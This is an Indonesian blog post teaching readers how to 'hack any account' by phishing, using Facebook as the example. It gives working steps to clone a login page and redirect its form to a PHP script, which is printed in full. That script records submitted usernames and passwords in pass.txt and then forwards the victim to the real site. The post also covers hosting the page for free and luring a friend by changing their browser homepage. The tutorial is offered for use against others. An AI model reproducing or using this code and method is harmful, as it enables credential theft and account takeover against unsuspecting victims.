ut Hack Semua Akun Dengan Teknik Phising - Turi Production

Sabtu, 06 Januari 2018

Hack Semua Akun Dengan Teknik Phising



Hack Semua Akun? Emang bisa? Memang terlihat mustahil namun didunia ini tidak ada yang tidak mungkin selama kita mau berusaha dan berdo’a tentunya, hehe.. Okeh, kali ini saya ingin mau bahas tentang cara hack semua akun, entah itu akun facebook, twitter, gmail, yahoo atau apapun selama akun tersebut memiliki halaman login kita bisa hack. Pasti udah gak sabaar yah, hehe.. Okeh saya jelasin dulu sedikit tentang teknik ini yah, Phising merupakanteknik hacking dengan melakukan pencurian informasi milik korban dengan cara memanfaatkan kelengahan user/korban melalui halaman phising yang telah kita buat.
Fungsi dari halaman phising ini adalah mengalihkan perhatian korban sehingga korban nantinya mau login melalui halaman phising yang telah kita buat. Okeh untuk contoh kali ini saya menggunakan halaman facebook, tapi intinya sama untuk semua jenis akun ko 
Okeh langsung kita mulai aja deh tutorialnya..
1. Buka http://www.facebook.com (Jika anda ingin hack twitter tinggal masuk halaman login twitter begitu juga yahoo, intinya kita mendapatkan halaman login dari akun yang akan kita buat halaman phisingnya  )
2. Klik Kanan >> View Page Source atau tekan CTRL + U
3. Copy semua kode yang ada disitu kemudian paste ke notepad
4. Tekan CTRL + F kemudian cari kata action=
5..Ubah.action=”https://www.facebook.com/login.php?login_attempt=1” menjadi action=”facebook.php” .. Ubah juga method dari POST menjadi get
6. Simpan notepad ini dengan nama index.php
7. Buat notepad baru kemudian isikan kode berikut\


<?php 
header(“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>


Note: ubah http://www.Facebook.com/login.php menjadi alamat web yang anda inginkan
8. Simpan Dengan Nama facebook.php
9. Buat notepad baru lagi .. isikan dengan huruf L >> Kemudian simpan dengan nama pass.txt
10. Kemudian Upload ke tiga file tersebut ke http://ripway.com atau ke alamat free hosting lainnya
11. Ubah permission pada file pass.txt menjadi 777 agar password dari akun korban dapat terbaca oleh system
Okeh selesai membuat halaman phising dari facebook/halaman akun korban tinggal kita pancing aja deh biar korban dapat masuk perangkap phising kita, hehe.. Okeh saya kasih tau cara paling gampangya deh, jika korban merupakan teman anda maka anda bisa menjebak korban dengan cara merubah homepage browser milik korban dengan halaman phising kita deh. Setelah itu ya tinggal tunggu aja deh korban kita terperangkap, hehe.. Selamat mencoba 


Tidak ada komentar:

Posting Komentar

komentar